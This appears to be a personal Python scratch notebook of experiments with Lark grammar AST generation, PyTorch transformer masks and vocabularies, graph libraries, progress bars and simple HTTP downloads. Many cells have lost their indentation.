G.add_node(node, label=label)
G.layout()
G.draw('example.png', format='png')
img = mpimg.imread('example.png')
plt.imshow(img)
plt.show()
# Path('./file.png').expanduser().unlink()
#%%
# load a graph from a dot for networkx: https://stackoverflow.com/questions/42172548/read-dot-graph-in-networkx-from-a-string-and-not-file
# G = nx_agraph.from_agraph(pygraphviz.AGraph(dotFormat))
#%%
import dgl.data
dataset = dgl.data.CoraGraphDataset()
print('-- my print statments --')
print(f'Number of categories: {dataset.num_classes}\n')
g = dataset[0]
print(f'{g=}')
# print('Node features')
# print(g.ndata)
# print('Edge features')
# print(g.edata)
h_node_features = g.ndata['feat']
print(h_node_features.size())
#%%
# import dgl
import networkx as nx
import numpy as np
import torch
nx_g = nx.DiGraph()
# Add 3 nodes and two features for them
nx_g.add_nodes_from([0, 1, 2], feat1=np.zeros((3, 1)), feat2=np.ones((3, 1)))
print(f'{nx_g=}')
# Add 2 edges (1, 2) and (2, 1) with two features, one being edge IDs
nx_g.add_edge(1, 2, weight=np.ones((1, 1)), eid=np.array([1]))
nx_g.add_edge(2, 1, weight=np.ones((1, 1)), eid=np.array([0]))
print(f'{nx_g=}')
#%%
import random
foo = ['a', 'b', 'c', 'd', 'e']
print(random.choice(foo))
#%%
pf_body1 = ['Proof.',
'unfold lookup_incl;', 'simpl;', 'intros.',
'match_destr;', 'unfold equiv in *;', 'subst.',
'- apply lookup_in in H1.',
'apply in_dom in H1.',
'intuition.',
'- auto.',
'Qed.']
pf_body1 = pf_body1[1:-1]
print(pf_body1)
#%%
pf_body1 = [ 'Proof.',
'unfold lookup_incl;', 'simpl;', 'intros.',
'match_destr;', 'unfold equiv in *;', 'subst.',
'- apply lookup_in in H1.',
'apply in_dom in H1.',
'intuition.',
'- auto.',
'Qed.']
def mask_lemma_in_pf_body(pf_body: list[str], lemma: str, mask_token: str = '<Predict>') -> list[str]:
    return [tactic_cmd.replace(lemma, mask_token) for tactic_cmd in pf_body]
print(mask_lemma_in_pf_body(pf_body1, 'in_dom'))
#%%
x = [1,2]
xx = ['a','b']
print(list(zip(x,xx)))
#%%
thms = "lookup_incl_cons_l_nin (l1 l2:list (A*B)) x y : \
lookup_incl l1 l2 -> \
~ In x (domain l1) -> \
lookup_incl l1 ((x,y)::l2)."
pf_bodies = [['Proof.',
'unfold lookup_incl;', 'simpl;', 'intros.',
'match_destr;', 'unfold equiv in *;', 'subst.',
'- apply lookup_in in H1.',
'apply in_dom in H1.',
'intuition.',
'- auto.',
'Qed.']]
pf_bodies[0] = pf_bodies[0][1:-1]
#%%
from lark import Lark
json_parser = Lark(r"""
value: dict
| list
| ESCAPED_STRING
| SIGNED_NUMBER
| "true" | "false" | "null"
list : "[" [value ("," value)*] "]"
dict : "{" [pair ("," pair)*] "}"
pair : ESCAPED_STRING ":" value
%import common.ESCAPED_STRING
%import common.SIGNED_NUMBER
%import common.WS
%ignore WS
""", start='value')
text = '{}'
ast = json_parser.parse(text)
print(ast.pretty())
text = '{"key": ["item0", "item1", 3.14]}'
ast = json_parser.parse(text)
print(ast.pretty())
#%%
from lark import Lark
json_parser = Lark(r"""
value: dict dict "f"
| list
| ESCAPED_STRING
| SIGNED_NUMBER
| "true" | "false" | "null"
list : "[" [value ("," value)*] "]"
dict : "{" [pair ("," pair)*] "}"
pair : ESCAPED_STRING ":" value
%import common.ESCAPED_STRING
%import common.SIGNED_NUMBER
%import common.WS
%ignore WS
""", start='value')
text = '{} {} f'
ast = json_parser.parse(text)
print(ast)
print(ast.pretty())
# text = '{"key": ["item0", "item1", 3.14, "true"]}'
# ast = json_parser.parse(text)
# print(ast)
# print(ast.pretty())
#%%
from lark import Lark
json_parser = Lark(r"""
pair: pair "," pair // 1
| string // 2
string : "a" // 3
| "b" // 4
%import common.WS
%ignore WS
""", start='pair', keep_all_tokens=True)
text = 'a'
ast = json_parser.parse(text)
print(ast)
print(ast.pretty())
# rule seq
rule_seq = ['pair', 'string', "1"]
rule_seq2 = ['pair->string', 'string->1']
text = "a, b"
ast = json_parser.parse(text)
print(ast)
print(ast.pretty())
rule_seq2 = ['pair -> pair "," pair', 'pair->string', 'pair->string', 'string->a', 'string->b']
rule_seq3 = [1, 2, 2, 3, 4]
rule_seq3 = [1, 2, 2, 3, 3, 4, 5]
#%%
from lark import Lark, Tree, Token
json_parser = Lark(r"""
pair: pair "," pair // 1
| string // 2
string : "a" // 3
| "b" // 4
%import common.WS
%ignore WS
""", start='pair', keep_all_tokens=True)
text = 'a'
ast = json_parser.parse(text)
print(ast)
print(ast.pretty())
# rule seq
rule_seq = ['pair', 'string', "1"]
rule_seq2 = ['pair->string', 'string->1']
text = "a, b"
ast = json_parser.parse(text)
print(ast)
print(ast.pretty())
rule_seq2 = ['pair->pair "," pair', 'pair->string', 'pair->string', 'string->a', 'string->b']
rule_seq2 = [rule.split('->') for rule in rule_seq2]
rule_seq3 = [1, 2, 2, 3, 4]
non_terminals = ['pair', 'string']
terminals = [",", "a", "b"]
def is_terminal(sym):
# true if matches hardcoded symbols in grammar or a regex, note this only works if the nt has been checked first.
return sym in terminals # or matches regex
def is_non_terminal(sym):
return sym in non_terminals
def build_lark_tree(rule_seq:list[tuple]) -> Tree:
print(rule_seq)
nt, next_syms = rule_seq[0]
if len(rule_seq) == 1:
return Tree(nt, [Token('literal', next_syms)])
else:
rule_seq = rule_seq[1:]
next_syms = next_syms.split(" ")
asts = []
nt_idx = 0
for next_sym in next_syms:
if is_non_terminal(next_sym):
ast = Tree(next_sym, build_lark_tree(rule_seq[nt_idx:]))
nt_idx += 1
elif is_terminal(next_sym):
ast = Token('literal', next_sym)
else:
raise ValueError(f'Invalid: {next_sym} didnt match anything')
asts.append(ast)
return Tree(nt, asts)
print('---- generating ast from Rule Seq')
build_lark_tree(rule_seq2)
#%%
from collections import defaultdict
from lark import Lark, Tree, Token
from lark.grammar import Rule, NonTerminal, Symbol, Terminal
from lark.reconstruct import Reconstructor
def build(rules: list[Rule], rule_seq: list[int], build_term) -> Tree:
def build_rule(rule: Rule) -> Tree:
l = []
for i, e in enumerate(rule.expansion):
if e.is_term:
l.append(build_term(e))
else:
l.append(e)
targets[e].append((l, i))
return Tree(rule.origin.name, l)
out: list = [NonTerminal("start")]
targets = defaultdict(list)
targets[out[0]].append((out, 0))
for i in rule_seq:
r = rules[i]
assert r.alias is None, "Can't have aliases"
assert r.options.keep_all_tokens, "need to have keep_all_tokens"
assert not (r.options.expand1 or r.origin.name.startswith("_")), "Can't have a rule that expands it's children"
ts = targets[r.origin]
l, i = ts.pop(0)
assert l[i] == r.origin, l
l[i] = build_rule(r)
return out[0]
grammar = r"""
start: "a" // rule 0
| "a" start // rule 1
"""
parser = Lark(grammar, keep_all_tokens=True)
print(parser.rules)
rule_seq1 = [1, 0]
ast = build(parser.rules, rule_seq1, lambda t: Token(t.name, "a"))
print(ast)
text = Reconstructor(parser).reconstruct(ast, None) # has string "aa"
print(repr(text))
#%%
from collections import deque
# Initializing a queue
q = deque()
# Adding elements to a queue
q.append('a')
q.append('b')
q.append('c')
print("Initial queue")
print(q)
# Removing elements from a queue
print("\nElements dequeued from the queue")
print(q.popleft())
print(q.popleft())
print(q.popleft())
print("\nQueue after removing elements")
print(q)
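# related sketch (my addition): a bounded queue that silently drops the oldest element when full
bounded = deque(maxlen=3)
for item in ['a', 'b', 'c', 'd']:
    bounded.append(item)
print(bounded)  # deque(['b', 'c', 'd'], maxlen=3)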
#%%
# https://github.com/MegaIng/lark_ast_generator/blob/master/ast_generator.py#L114
#%%
from typing import Union
from collections import deque
from lark import Lark, Tree, Token
from lark.grammar import Rule, NonTerminal, Symbol, Terminal
from lark.reconstruct import Reconstructor
grammar = r"""
pair: pair "," pair // 1
| string // 2
string : "a" // 3
| "b" // 4
%import common.WS
%ignore WS
"""
parser = Lark(grammar, start='pair', keep_all_tokens=True)
print(parser.rules)
print(parser.rules[0])
#%%
# I want a queue that removes the
#%%
from __future__ import annotations  # needed below: Hole/HoleTree and list[...]/tuple[...] hints are referenced before they are defined
from collections import defaultdict
from random import choice
from typing import Optional, Callable
from lark import Lark, Token, Tree, Transformer
from lark.grammar import Terminal, NonTerminal, Rule
from lark.lexer import TerminalDef
from lark.visitors import Interpreter
class ASTGenerator:
def __init__(self, parser: Lark, term_builder=None):
self.parser = parser
self.term_builder = term_builder
self.term_by_name = {t.name: t for t in self.parser.terminals}
self.rule_by_symbol = defaultdict(list)
for r in self.parser.rules:
self.rule_by_symbol[r.origin].append(r)
def _term_builder(self, term: Terminal):
term_def: TerminalDef = self.term_by_name[term.name]
if term_def.pattern.type == "str":
return Token(term.name, term_def.pattern.value)
elif self.term_builder:
return self.term_builder(term_def)
else:
raise ValueError("Can't build Token for Terminal %r" % term.name)
def _rule_builder(self, rule: Rule, hole: Hole):
children = []
for sym in rule.expansion:
if sym.is_term:
if not sym.filter_out or rule.options.keep_all_tokens:
children.append(self._term_builder(sym))
else:
children.append(sym)
tree = Tree(rule.alias or rule.origin.name, children)
if not rule.alias and (tree.data.startswith("_") or (rule.options.expand1 and len(children) == 1)):
hole.expand(tree)
else:
hole.fill(tree)
def start_build(self, start=None):
# We could just copy the code
start = self.parser.parser._verify_start(start)
return HoleTree(NonTerminal(start))
def build_absolute_index(self, hole_tree: HoleTree, rules: list[int]):
for i in rules:
r = self.parser.rules[i]
hole = hole_tree.get_for_symbol(r.origin)
self._rule_builder(r, hole)
def build_relative_index(self, hole_tree: HoleTree, rules: list[int]):
meaning = []
for i in rules:
hole = hole_tree.bfs_first_hole
options = self.rule_by_symbol[hole.symbol]
rule = options[i]
meaning.append((i, hole.path, rule))
self._rule_builder(rule, hole)
return meaning
def build_picker(self, hole_tree: HoleTree, picker: Callable[[list[Rule], Hole], Rule], n: int = None):
track = []
i = 0
while hole_tree.any_holes and (n is None or i < n):
hole = hole_tree.bfs_first_hole
options = self.rule_by_symbol[hole.symbol]
rule = picker(options, hole)
track.append(options.index(rule))
self._rule_builder(rule, hole)
i += 1
return track
class InlineTree(Tree):
pass
class Hole:
def __init__(self, target: Optional[list], index: int, hole_tree: HoleTree, path: tuple[int, ...]):
self.target = target
if target is None:
self.symbol = index
self.index = 0
else:
self.symbol = target[index]
self.index = index
assert isinstance(self.symbol, NonTerminal), self.symbol
self.hole_tree = hole_tree
self.path = path
def _get_holes(self, values, target, offset):
for i, v in enumerate(values):
if isinstance(v, NonTerminal):
yield Hole(target, offset + i, self.hole_tree, (*self.path, i))
def expand(self, tree: Tree):
assert self.target is not None, "start rule can't be inlined"
self.target[self.index] = InlineTree(tree.data, tree.children, tree.meta)
self.hole_tree.filled(self, self._get_holes(tree.children, tree.children, 0))
def fill(self, tree: Tree):
if self.target is None:
self.hole_tree.set_start(tree)
else:
self.target[self.index] = tree
self.hole_tree.filled(self, self._get_holes(tree.children, tree.children, 0))
def flatten_inline_tree(items):
"""Yield items from any nested iterable; see Reference."""
for x in items:
if isinstance(x, InlineTree):
for sub_x in flatten_inline_tree(x.children):
yield sub_x
else:
yield x
class _InlineExpands(Interpreter):
def __default__(self, tree):
new_tree = Tree(tree.data, list(flatten_inline_tree(tree.children)), tree.meta)
new_tree.children = self.visit_children(new_tree)
return new_tree
class HoleTree:
def __init__(self, start_symbol):
self._tree = None
self.holes_by_path = {}
self.holes_by_symbol = defaultdict(list)
self.holes_by_path[()] = Hole(None, start_symbol, self, ())
self.holes_by_symbol[start_symbol].append(self.holes_by_path[()])
def set_start(self, tree):
assert self._tree is None
self._tree = tree
def filled(self, old_hole, new_holes):
self.holes_by_symbol[old_hole.symbol].remove(old_hole)
assert self.holes_by_path.pop(old_hole.path) is old_hole
for nh in new_holes:
self.holes_by_symbol[nh.symbol].append(nh)
assert nh.path not in self.holes_by_path
self.holes_by_path[nh.path] = nh
def tree(self, raw:bool = False):
return _InlineExpands().visit(self._tree) if not raw else self._tree
@property
def bfs_first_hole(self):
return self.holes_by_path[min(self.holes_by_path, key=lambda t: (len(t), t))]
@property
def any_holes(self):
return bool(self.holes_by_path)
def get_for_symbol(self, symbol):
return self.holes_by_symbol[symbol][0]
def random_picker(options, hole):
return choice(options)
def depth(min_depth=3, max_depth=5, base=random_picker):
def picker(options: list[Rule], hole):
current = len(hole.path)
if current < min_depth:
new_options = [o for o in options
if any(not s.is_term for s in o.expansion)]
if new_options:
options = new_options
if current + 1 > max_depth:
new_options = [o for o in options
if all(s.is_term for s in o.expansion)]
if new_options:
options = new_options
return base(options, hole)
return picker
#%%
from collections import defaultdict
from operator import neg
from typing import Iterable
from lark import Lark, Tree, Token
from lark.grammar import Symbol, NonTerminal, Terminal
from lark.reconstruct import Reconstructor, is_iter_empty
from lark.tree_matcher import is_discarded_terminal, TreeMatcher
from lark.visitors import Transformer_InPlace, Interpreter
class RulesGenerator(Interpreter):
def __init__(self, parser):
super(RulesGenerator, self).__init__()
self.parser = parser
self.rules_by_name = defaultdict(list)
self.aliases = defaultdict(list)
for i, r in enumerate(self.parser.rules):
self.rules_by_name[r.origin.name].append((r, i))
if r.alias is not None:
self.rules_by_name[r.alias].append((r, i))
self.aliases[r.alias].append(r.origin.name)
for n, rs in self.rules_by_name.items():
self.rules_by_name[n] = sorted(rs, key=lambda t: -len(t[0].expansion))
self.tree_matcher = TreeMatcher(parser)
self.current_path = []
self.values = {}
def _check_name(self, data, target):
if data == target:
return True
elif data in self.aliases:
return target in self.aliases[data]
else:
return False
def _check_expansion(self, orig_expansion, expansion):
return len(orig_expansion) == len(expansion) and all(o == e for o, e in zip(orig_expansion, expansion))
def get_rule(self, tree):
candidates = self.rules_by_name[tree.data]
matches = [(r, i) for (r, i) in candidates
if self._check_expansion(tree.meta.orig_expansion, r.expansion)]
if not matches:
# Sometimes, tree_matcher returns weird self rules Tree('expansion', [Tree('expansion', [...])])
if len(tree.meta.orig_expansion) == 1 and self._check_name(tree.meta.orig_expansion[0].name, tree.data):
return None
assert matches, ("No rule left that was applied", tree, candidates)
assert len(matches) == 1, ("Can't decide which rule was applied", candidates, matches)
return matches[0][1]
def __default__(self, tree):
if not getattr(tree.meta, 'match_tree', False):
# print("|"*len(self.current_path), "old", tree)
tree = self.tree_matcher.match_tree(tree, tree.data)
# print("|"*len(self.current_path), tree)
r = self.get_rule(tree)
for i, c in enumerate(tree.children):
if isinstance(c, Tree):
self.current_path.append(i)
tree.children[i] = self.visit(c)
self.current_path.pop()
# print("|"*len(self.current_path),"final", tree)
if r is not None:
self.values[tuple(self.current_path)] = r
return tree
def get_rules(self, tree) -> Iterable[int]:
self.current_path = []
self.values = {}
self.visit(tree)
return [i for k, i in sorted(self.values.items(), key=lambda t: tuple(map(neg, t[0])))]
#%%
import pprint as pp
from lark import Lark
grammar = r"""
?pair: pair "," pair // 0
| string // 1
string : "a" -> aaa // 2
| "b" -> bbb // 3
%import common.WS
%ignore WS
"""
start = 'pair'
parser = Lark(grammar, start=start, keep_all_tokens=True)
# parser = Lark(grammar, start=start)
text = "a, b"
ast = parser.parse(text)
print(ast.pretty())
pp.pprint(parser.rules)
#%%
from lark import Lark
from lark.visitors import Transformer_InPlace, Interpreter
class Inte1(Interpreter):
def pair(self, tree):
print('pair')
self.visit_children(tree)
def string(self, tree):
print('string')
grammar = r"""
pair: pair "," pair // 0
| string // 1
string : "a" // 2
| "b" // 3
%import common.WS
%ignore WS
"""
start = 'pair'
parser = Lark(grammar, start=start, keep_all_tokens=True)
text = "a, b"
ast = parser.parse(text)
print(ast)
Inte1().visit(ast)
#%%
x = [1, 2, 5]
print(sorted(x))
x = [1.1, 1.5, 0.1, 1.0]
print(list(map(round, x)))
print(sorted(x, key=round))
from lark.tree_matcher import is_discarded_terminal, TreeMatcher
#%%
from lark import Lark
json_parser = Lark(r"""
value: dict
| list
| ESCAPED_STRING
| SIGNED_NUMBER
| "true" | "false" | "null"
list : "[" [value ("," value)*] "]"
dict : "{" [pair ("," pair)*] "}"
pair : ESCAPED_STRING ":" value
%import common.ESCAPED_STRING
%import common.SIGNED_NUMBER
%import common.WS
%ignore WS
""", start='value', keep_all_tokens=True)
text = '{}'
ast = json_parser.parse(text)
print(ast.pretty())
text = '{"key": ["item0", "item1", 3.14]}'
ast = json_parser.parse(text)
print(ast.pretty())
#%%
ctx = {'x': 1}
names = ['y', 'y']
all_names = set(list(ctx.keys()) + names)
print(all_names)
#%%
import re
bfs_regex = re.compile(r'x\d+')
assert not bfs_regex.match('x')
print(bfs_regex.match('x'))
print(bfs_regex.search('x'))
assert bfs_regex.match('x0')
print(bfs_regex.match('x0'))
print(bfs_regex.search('x0'))
#%%
print("_".join(['x0']))
print('123'.isnumeric())
print('asdfadsf'.isnumeric())
print('x123'.isnumeric())
#%%
# this checks that both tensors are actually the same
import torch
import torch.nn as nn
import torch.optim as optim
embeds = nn.Embedding(1, 1)
lin = nn.Linear(3, 1)
embeds.weight = torch.nn.Parameter(lin.weight)
sgd = optim.SGD(lin.parameters(), 10)
print(lin.weight)
print(embeds.weight)
out = 10*(2 - lin(torch.randn(1, 3)))*2
out.backward()
sgd.step()
print(lin.weight)
print(embeds.weight)
# this succeded because the weights are the same value after the backward step
#%%
from collections import Counter
from torchtext.vocab import Vocab
import torch
import torch.nn as nn
counter_vocab = Counter({'a': 1, 'b': 2, '0': 5})
v = Vocab(counter_vocab)
table = nn.Embedding(len(v), 4)
lookup_tensor = torch.tensor([1, 2, 0], dtype=torch.long)
embed = table(lookup_tensor)
print(embed.size())
print(embed.t().size())
att = embed.t() @ embed
# att = embed.t() * embed
print(att)
from torch.nn.functional import softmax
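# using the softmax import above (my addition): row-normalize the raw attention scores
att_weights = softmax(att, dim=-1)
print(att_weights.size())
print(att_weights.sum(dim=-1))  # each row sums to 1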
#%%
import torch
import torch.nn as nn
B, T, D = 4, 12, 512
x = torch.randn(B, T, D)
encoder = nn.TransformerEncoderLayer(d_model=512, nhead=8, batch_first=True)
out = encoder(x)
print(out.sum())
encoder.batch_first = False
out = encoder(x)
print(out.sum())
encoder.batch_first = True
out = encoder(x)
print(out.sum())
#%%
import torch
import torch.nn as nn
encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8)
transformer_encoder = nn.TransformerEncoder(encoder_layer, num_layers=6)
src = torch.rand(10, 32, 512)
out = transformer_encoder(src)
decoder_layer = nn.TransformerDecoderLayer(d_model=512, nhead=8)
transformer_decoder = nn.TransformerDecoder(decoder_layer, num_layers=6)
memory = torch.rand(10, 32, 512)
tgt = torch.rand(20, 32, 512)
out = transformer_decoder(tgt, memory)
print(out.size())
#%%
# right shift
# [B, Ty] -> [B, Ty] (right shifted, replace initial vectors with random noise)
import torch
from torch import Tensor
y: Tensor = torch.arange(0, 12)
y = y.view(3, 4)
print(y.size())
print(y)
yy = y.roll(shifts=1, dims=1)
yy[:, 0] = 0 # SEEMS DANGEROUS!
print(yy)
# scary, perhaps it's better to only index the first T-1 and then initialize the first as zero...?
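# the alternative the comment above hints at (a sketch): drop the last column and prepend a
# column of start tokens, instead of rolling and overwriting in place
start_col = torch.zeros(y.size(0), 1, dtype=y.dtype)
yy2 = torch.cat([start_col, y[:, :-1]], dim=1)
print(yy2)  # same result as the roll + overwrite above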
#%%
from torchtext.vocab import vocab
from collections import Counter, OrderedDict
counter = Counter(["a", "a", "b", "b", "b"])
sorted_by_freq_tuples = sorted(counter.items(), key=lambda x: x[1], reverse=True)
ordered_dict = OrderedDict(sorted_by_freq_tuples)
v1 = vocab(ordered_dict)
print(v1['a']) #prints 1
# print(v1['out of vocab']) #raise RuntimeError since default index is not set
tokens = ['e', 'd', 'c', 'b', 'a']
v2 = vocab(OrderedDict([(token, 1) for token in tokens]))
#adding <unk> token and default index
unk_token = '<unk>'
default_index = -1
if unk_token not in v2:
v2.insert_token(unk_token, 0)
v2.set_default_index(default_index)
print(v2['<unk>']) #prints 0
print(v2['out of vocab']) #prints -1
#make default index same as index of unk_token
v2.set_default_index(v2[unk_token])
v2['out of vocab'] is v2[unk_token] #prints True
#%%
import torch
# x = torch.randn(2, 3)
# sz = x.size( )
sz = 4
mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)
mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))
# print(x)
print(mask)
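# equivalent one-liner (my addition): -inf strictly above the diagonal, 0 on and below it
mask2 = torch.triu(torch.full((sz, sz), float('-inf')), diagonal=1)
print(mask2)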
#%%
# note (assumption): torch, DEVICE and PAD_IDX are expected to be defined elsewhere; these helpers
# follow the mask-construction pattern used in the PyTorch seq2seq/translation tutorial
def generate_square_subsequent_mask(sz):
mask = (torch.triu(torch.ones((sz, sz), device=DEVICE)) == 1).transpose(0, 1)
mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))
return mask
def create_mask(src, tgt):
src_seq_len = src.shape[0]
tgt_seq_len = tgt.shape[0]
tgt_mask = generate_square_subsequent_mask(tgt_seq_len)
src_mask = torch.zeros((src_seq_len, src_seq_len),device=DEVICE).type(torch.bool)
src_padding_mask = (src == PAD_IDX).transpose(0, 1)
tgt_padding_mask = (tgt == PAD_IDX).transpose(0, 1)
return src_mask, tgt_mask, src_padding_mask, tgt_padding_mask
#%%
import uutils.torch
# inheritance in python
# Q: do my subclasses inherit the specific values from parent?
class Parent:
    def __init__(self, field):
        self.field = field
        # note: building Child(field) here would recurse forever, since Child.__init__
        # calls super().__init__, which would construct yet another Child
        # self.child = Child(field)
class Child(Parent):
    def __init__(self, field):
        super().__init__(field)
        # print(f'{self.field}')
    def forward(self, x):
        print(f'{x=}')
        print(f'{self.field}')
parent = Parent(field=2)
child = Child(field=3)
print(f'{child.field=}')  # yes: Parent.__init__ sets field on the child instance too
# %%
import torch
from torch.nn.utils.rnn import pad_sequence
# note the sequences start with 2 for SOS and end with 3 for EOS
special_symbols = ['<unk>', '<pad>', '<sos>', '<eos>']
PAD_IDX = special_symbols.index('<pad>')
src_batch = [torch.tensor([2, 7911, 3]), torch.tensor([2, 8269, 5, 18, 3])]
print(f'batch_size={len(src_batch)}')
src_batch = pad_sequence(src_batch, padding_value=PAD_IDX, batch_first=True)
print(src_batch.size())
print(src_batch)
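# follow-up sketch (my addition): the boolean key-padding mask can be read straight off the batch
src_padding_mask = (src_batch == PAD_IDX)
print(src_padding_mask)  # True where the position is padding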
#%%
import torch
sz = 4
mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)
mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))
# print(x)
print(mask)
#%%
# https://stackoverflow.com/questions/47863001/how-pytorch-tensor-get-the-index-of-specific-value
import torch
t = torch.Tensor([0, 2, 3, 2, 1])
print(t.size())
# print(t == 2)
print((t == 2).nonzero().size())
print((t == 2).nonzero())
print((t == 2).nonzero()[0])
print((t == 2).nonzero()[0][0])
print((t == 2).nonzero()[0][0].item())
print((t == 99).nonzero())
print((t == 99).nonzero())
# t = torch.Tensor([1, 0, 2, 3, 2, 2, 1])
# print(t == 222)
# print((t == 222).nonzero(as_tuple=True)[0])
# print((t == 222).nonzero(as_tuple=True))
# print( ((t == 2).nonzero(as_tuple=True)[0]) )
# print( ((t == 2).nonzero(as_tuple=True)[0]).size() )
# print( (t == 2).nonzero() )
# print( (t == 2).nonzero().size() )
#%%
# from lark import Lark
import lark as l
json_parser = l.Lark(r"""
value: dict dict "f"
| list
| ESCAPED_STRING
| SIGNED_NUMBER
| "true" | "false" | "null"
list : "[" [value ("," value)*] "]"
dict : "{" [pair ("," pair)*] "}"
pair : ESCAPED_STRING ":" value
%import common.ESCAPED_STRING
%import common.SIGNED_NUMBER
%import common.WS
%ignore WS
""", start='value')
text = '{} {} f'
ast = json_parser.parse(text)
print(ast)
print(ast.pretty())
# %%
import torch
B, T, D = 2, 3, 4
x = torch.randn(B, T, D)
print(x)
print()
print(torch.transpose(x, 1, 2))
# %%
import torch
x = torch.zeros(4, 3)
print(x)
x[1:, :] = torch.ones(1, 3)
print(x)
#%%
import time
import progressbar
with progressbar.ProgressBar(max_value=10) as bar:
for i in range(10):
time.sleep(0.1)
time.sleep(1)
bar.update(i)
#%%
# import time
# import progressbar
#
# bar = progressbar.ProgressBar(max_value=10)
# for i in range(10):
# time.sleep(0.1)
# print(f'{i=}')
# bar.update(i)
#%%
from tqdm import tqdm
import time
with tqdm(total=10) as bar:
for i in range(10):
# time.sleep(0.1)
time.sleep(1)
print(f'{i=}')
bar.update(i)
#%%
from tqdm import tqdm
import time
for i in tqdm(range(10)):
# time.sleep(0.1)
time.sleep(5)
print(f'{i=}')
#%%
# progress bar 2 with it per second: https://github.com/WoLpH/python-progressbar/issues/250
import time
import progressbar
with progressbar.ProgressBar(max_value=10, unit='it') as bar:
for i in range(10):
time.sleep(0.1)
time.sleep(1)
bar.update(i)
#%%
# conda install -y pytorch-geometric -c rusty1s -c conda-forge
import torch
from torch_geometric.data import Data
# [2, number_edges], edge = (node_idx1, node_idx2), e.g. e = (0,1) = (n0, n1) (note this is reflected on the type torch long)
edge_index = torch.tensor([[0, 1, 1, 2],
[1, 0, 2, 1]], dtype=torch.long)
# features to each node [num_nodes, D]
x = torch.tensor([[0.0], [-1.0], [1.0]])
data = Data(x=x, edge_index=edge_index)
print(data)
# https://discuss.pytorch.org/t/pytorch-geometric/44994
# https://stackoverflow.com/questions/61274847/how-to-visualize-a-torch-geometric-graph-in-python
import networkx as nx
from torch_geometric.utils.convert import to_networkx
g = to_networkx(data)
nx.draw(g)
#%%
#%%
# import time
# import progressbar
#
# with progressbar.ProgressBar(max_value=10) as bar:
# for i in range(10):
# time.sleep(0.1)
# time.sleep(1)
# bar.update(i)
import time
import progressbar
bar = progressbar.ProgressBar(max_value=5)
for i in range(5):
time.sleep(1)
bar.update(i)
"""
80% (4 of 5) |#################### | Elapsed Time: 0:00:04 ETA: 0:00:01
"""
#%%
"""
Use this one to make sure the "end" is shown properly 100% etc
https://gist.github.com/brando90/3304119120841b1ebf892fe93a2cc3c9
the key is to wrap the iterator (of fixed length) using bar e.g. bar(range(100))
"""
import time
import progressbar
widgets = [
progressbar.Percentage(),
progressbar.Bar(),
' ', progressbar.SimpleProgress(),
' ', progressbar.ETA(),
' ', progressbar.AdaptiveTransferSpeed(unit='it'),
]
bar = progressbar.ProgressBar(widgets=widgets)
for i in bar(range(100)):
time.sleep(0.1)
bar.update(i)
"""
19%|########## | 19 of 100 ETA: 0:00:17 4.9 it/s
when done:
100%|####################################| 100 of 100 Time: 0:00:20 4.9 it/s
"""
#%%
"""
from default
99% (9998 of 10000) |########## | Elapsed Time: 1 day, 16:35:09 ETA: 0:00:26
"""
import time
import progressbar
widgets = [
progressbar.Percentage(),
' ', progressbar.SimpleProgress(format=f'({progressbar.SimpleProgress.DEFAULT_FORMAT})'),
' ', progressbar.Bar(),
' ', progressbar.Timer(), ' |',
' ', progressbar.ETA(), ' |',
' ', progressbar.AdaptiveTransferSpeed(unit='it'),
]
bar = progressbar.ProgressBar(widgets=widgets)
for i in bar(range(100)):
time.sleep(0.1)
bar.update(i)
#%%
import uutils
def test_good_progressbar():
import time
bar = uutils.get_good_progressbar()
for i in bar(range(100)):
time.sleep(0.1)
bar.update(i)
print('---- start context manager test ---')
max_value = 10
with uutils.get_good_progressbar(max_value=max_value) as bar:
for i in range(max_value):
time.sleep(1)
bar.update(i)
test_good_progressbar()
#%%
import time
import progressbar
# bar = progressbar.ProgressBar(max_value=progressbar.UnknownLength)
bar = uutils.get_good_progressbar(max_value=progressbar.UnknownLength)
for i in range(20):
time.sleep(0.1)
bar.update(i)
#%%
import torch
import transformers
from transformers.optimization import Adafactor, AdafactorSchedule
model = torch.nn.Linear(1, 1)
optimizer = Adafactor(model.parameters(), scale_parameter=True, relative_step=True, warmup_init=True, lr=None)
lr_scheduler = AdafactorSchedule(optimizer)
#%%
# import requests, io
URL = 'http://safelearning.ai/formalml-data/dataset10000.zip'
# urlData = requests.get(URL).content
#%%
# import urllib
from pathlib import Path
import urllib.request
url: str = 'http://safelearning.ai/formalml-data/dataset10000.zip'
filename: str = url.split('/')[-1]
assert filename == 'dataset10000.zip'
# filename = f'{filename}'
filename = f'./{filename}'
# filename = str(Path(f'~/Desktop/{filename}').expanduser())
# testfile = urllib.URLopener()
# testfile.retrieve(url, zip_name)
# urllib.urlretrieve("http://randomsite.com/file.gz", "file.gz")
urllib.request.urlretrieve(url, filename)
#%%
a = {'a', 'b', 'c', 'd'}
b = {'d', 'e', 'f'}
c = a.union(b)
print(c)
print(a.intersection(b))
print(len(a))
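# two more set operations in the same spirit (my additions):
print(a.difference(b))            # elements only in a
print(a.symmetric_difference(b))  # elements in exactly one of the two sets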
#%%
import asyncio
async def main():
print('Hello ...')
await asyncio.sleep(5)
print('... World!')
# Python 3.7+
asyncio.run(main())
#%%
# https://realpython.com/python-concurrency/#what-is-parallelism
import requests
import time
def download_site(url, session):
with session.get(url) as response:
print(f"Read {len(response.content)} from {url}")
def download_all_sites(sites):
with requests.Session() as session:
for url in sites:
download_site(url, session)
if __name__ == "__main__":
sites = [
"https://www.jython.org",
"http://olympus.realpython.org/dice",
] * 80
start_time = time.time()
download_all_sites(sites)
duration = time.time() - start_time
print(f"Downloaded {len(sites)} in {duration} seconds")
#%%
# https://realpython.com/python-concurrency/#what-is-parallelism
import concurrent.futures
import requests
import threading
import time
thread_local = threading.local()
def get_session():
if not hasattr(thread_local, "session"):
thread_local.session = requests.Session()
return thread_local.session
def download_site(url):
session = get_session()
with session.get(url) as response:
print(f"Read {len(response.content)} from {url}")
def download_all_sites(sites):
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
executor.map(download_site, sites)
if __name__ == "__main__":
sites = [
"https://www.jython.org",
"http://olympus.realpython.org/dice",
] * 80
start_time = time.time()
download_all_sites(sites)
duration = time.time() - start_time
